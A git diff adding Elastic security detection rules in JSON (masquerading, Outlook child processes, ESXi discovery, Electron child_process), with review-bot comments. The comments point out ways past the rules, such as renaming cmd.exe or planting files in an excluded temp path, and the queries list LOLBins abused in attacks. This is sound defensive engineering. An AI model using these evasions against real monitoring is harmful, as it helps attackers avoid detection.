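Review bot: The `setup` audit rule `-a always,exit -F arch=b64 -S mprotect` logs 64-bit syscalls only, so a 32-bit binary calling mprotect on an x86_64 host is never recorded and the first sequence in `query` cannot fire for it; add `-a always,exit -F arch=b32 -S mprotect` next to it, or state the 64-bit-only scope in `setup`. Auditing every mprotect call is also high-volume on hosts running JIT runtimes, and if the deployment's auditctl accepts argument filters, appending `-F a2=7` to the audit rule keeps only the RWX calls the query inspects. Note too that `auditd.data.a2 == "7"` is an exact string match, so a prot value that also carries PROT_GROWSDOWN/PROT_GROWSUP bits (auditd reports the argument in hex) would not match, and a binary that maps RWX pages directly with mmap rather than mprotect is out of scope — both deserve a sentence in `description`.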
diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json new file mode 100644 index 00000000000..a29627e90e7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108.json 
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 
@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json new file mode 100644 index 00000000000..544cce2d17a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109.json 
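Review bot: The two Opera exclusions in `query` carve out `?:\\Windows\\Temp\\.opera\\????????????\\CProgram?Files*`, and `%SystemRoot%\Temp` is commonly creatable by standard users, so an unprivileged process could plant `C:\Windows\Temp\.opera\<12 chars>\CProgram FilesOpera\x.exe` and stay below this rule — exactly the low-privilege masquerading the `description` says it targets. Consider gating that exclusion on the publisher rather than the path alone, e.g. `not (process.executable : "?:\\Windows\\Temp\\.opera\\*" and process.code_signature.trusted == true and process.code_signature.subject_name : "Opera*")`, and adding the signature fields to `required_fields`. This presumes the sources listed in `index` populate `process.code_signature.*`; Endgame and `logs-system.security*` events may not, which should be checked first.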
@@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution from a directory masquerading as the Windows Program Files directories. These paths are trusted and usually host trusted third party programs. An adversary may leverage masquerading, along with low privileges to bypass detections allowlisting those folders.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Program Files Directory Masquerading", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.executable : \"C:\\\\*Program*Files*\\\\*.exe\" and\n not process.executable : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Downloaded Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?FilesOpera*\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\.opera\\\\????????????\\\\CProgram?Files?(x86)Opera*\\\\*.exe\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to 
@timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "32c5cf9c-2ef8-4e87-819e-5ccb7cd18b14_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json new file mode 100644 index 00000000000..0602d66ad23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_110.json 
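Review bot: The positive match in `query`, `process.executable : "C:\\*Program*Files*\\*.exe"`, is pinned to drive C: while every exclusion beneath it uses the `?:` drive wildcard, so a look-alike directory such as `D:\Program Files Common\x.exe` on a second volume is never evaluated. If that narrowing is intentional it deserves a sentence in `description`; otherwise `"?:\\*Program*Files*\\*.exe"` makes the match and the exclusions agree. Only the `index` entry differs from the _108 revision of this rule, so the same point applies there.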
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Outlook Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. 
Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + 
"reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "32f4675e-6c49-4ace-80f9-97c9259dca2e_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json new file mode 100644 index 00000000000..f7f2b74e3d4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/32f4675e-6c49-4ace-80f9-97c9259dca2e_111.json 
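Review bot: `query` keys the suspicious-child check on `process.name` alone, so copying `cmd.exe` or `powershell.exe` under another name before Outlook launches it sidesteps the rule while `process.parent.name : "outlook.exe"` still matches. For the signed Windows binaries in this list `process.pe.original_file_name` survives a rename; matching `(process.name : (...) or process.pe.original_file_name : (...))` closes that gap, with the field added to `required_fields`. Whether every source in `index` (Endgame, `logs-system.security*`) populates `process.pe.original_file_name` should be confirmed before relying on it.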
@@ -0,0 +1,143 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious child processes of Microsoft Outlook. These child processes are often associated with spear phishing activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious MS Outlook Child Process", + "note": "## Triage and analysis\n\n### Investigating Suspicious MS Outlook Child Process\n\nMicrosoft Outlook is an email client that provides contact, email calendar, and task management features. Outlook is widely used, either standalone or as part of the Office suite.\n\nThis rule looks for suspicious processes spawned by MS Outlook, which can be the result of the execution of malicious documents and/or exploitation for initial access.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently opened files received via email and opened by the user that could cause this behavior. 
Common locations include but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.name : \"outlook.exe\" and\n process.name : (\"Microsoft.Workflow.Compiler.exe\", \"arp.exe\", \"atbroker.exe\", \"bginfo.exe\", \"bitsadmin.exe\",\n \"cdb.exe\", \"certutil.exe\", \"cmd.exe\", \"cmstp.exe\", \"cscript.exe\", \"csi.exe\", \"dnx.exe\", \"dsget.exe\",\n \"dsquery.exe\", \"forfiles.exe\", \"fsi.exe\", \"ftp.exe\", \"gpresult.exe\", \"hostname.exe\", \"ieexec.exe\",\n \"iexpress.exe\", \"installutil.exe\", \"ipconfig.exe\", \"mshta.exe\", \"msxsl.exe\", \"nbtstat.exe\", \"net.exe\",\n \"net1.exe\", \"netsh.exe\", \"netstat.exe\", \"nltest.exe\", \"odbcconf.exe\", \"ping.exe\", \"powershell.exe\",\n \"pwsh.exe\", \"qprocess.exe\", \"quser.exe\", \"qwinsta.exe\", \"rcsi.exe\", \"reg.exe\", \"regasm.exe\",\n \"regsvcs.exe\", \"regsvr32.exe\", \"sc.exe\", \"schtasks.exe\", \"systeminfo.exe\", \"tasklist.exe\",\n \"tracert.exe\", \"whoami.exe\", \"wmic.exe\", \"wscript.exe\", \"xwizard.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "32f4675e-6c49-4ace-80f9-97c9259dca2e", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + 
"reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "32f4675e-6c49-4ace-80f9-97c9259dca2e_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json new file mode 100644 index 00000000000..df44692e38f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/33a6752b-da5e-45f8-b13a-5f094c09522f_6.json 
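Review bot: The `False positive analysis` section in `note` says this activity is unlikely to happen legitimately, yet the `process.name` list in `query` includes `ipconfig.exe`, `hostname.exe`, `ping.exe` and `tracert.exe`, which Outlook add-ins or support tooling may plausibly spawn, and the risk score of 21 suggests noise is expected; the guide should say which entries are expected to need exceptions rather than treating them as an edge case. Conversely, binaries common in phishing chains — `rundll32.exe`, `msiexec.exe`, `curl.exe`, `msbuild.exe`, `powershell_ise.exe` — are absent; if that is deliberate (covered by other rules) a sentence in `description` would stop the next maintainer from re-adding them. This revision differs from _110 only in the `index` entry.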
@@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as \"/etc/vmware/\", \"/usr/lib/vmware/\", or \"/vmfs/*\". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "ESXI Discovery via Find", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"find\" and process.args : (\"/etc/vmware/*\", \"/usr/lib/vmware/*\", \"/vmfs/*\")\n", + "references": [ + "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "33a6752b-da5e-45f8-b13a-5f094c09522f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1518", + "name": "Software Discovery", + "reference": "https://attack.mitre.org/techniques/T1518/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "33a6752b-da5e-45f8-b13a-5f094c09522f_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json new file mode 100644 index 00000000000..968c18926c5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35330ba2-c859-4c98-8b7f-c19159ea0e58_106.json 
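Review bot: The `process.args` patterns in `query` (`"/etc/vmware/*"`, `"/usr/lib/vmware/*"`, `"/vmfs/*"`) all require the literal trailing slash, so the most natural invocations — `find /vmfs -name '*.vmdk'` or `find /etc/vmware` — pass the bare directory and do not match. Adding the bare forms, `process.args : ("/etc/vmware", "/etc/vmware/*", "/usr/lib/vmware", "/usr/lib/vmware/*", "/vmfs", "/vmfs/*")`, covers both spellings. Separately, `setup` says the rule requires Elastic Defend while `index` also lists `auditbeat-*` and `logs-auditd_manager.auditd-*` and the tags name Auditd Manager; the setup text should mention those alternative sources.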
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to execute a child process from within the context of an Electron application using the child_process Node.js module. Adversaries may abuse this technique to inherit permissions from parent processes.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution via Electron Child Process Node.js Module", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and process.args:(\"-e\" and const*require*child_process*)\n", + "references": [ + "https://www.matthewslipper.com/2019/09/22/everything-you-wanted-electron-child-process.html", + "https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/", + "https://nodejs.org/api/child_process.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "35330ba2-c859-4c98-8b7f-c19159ea0e58", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
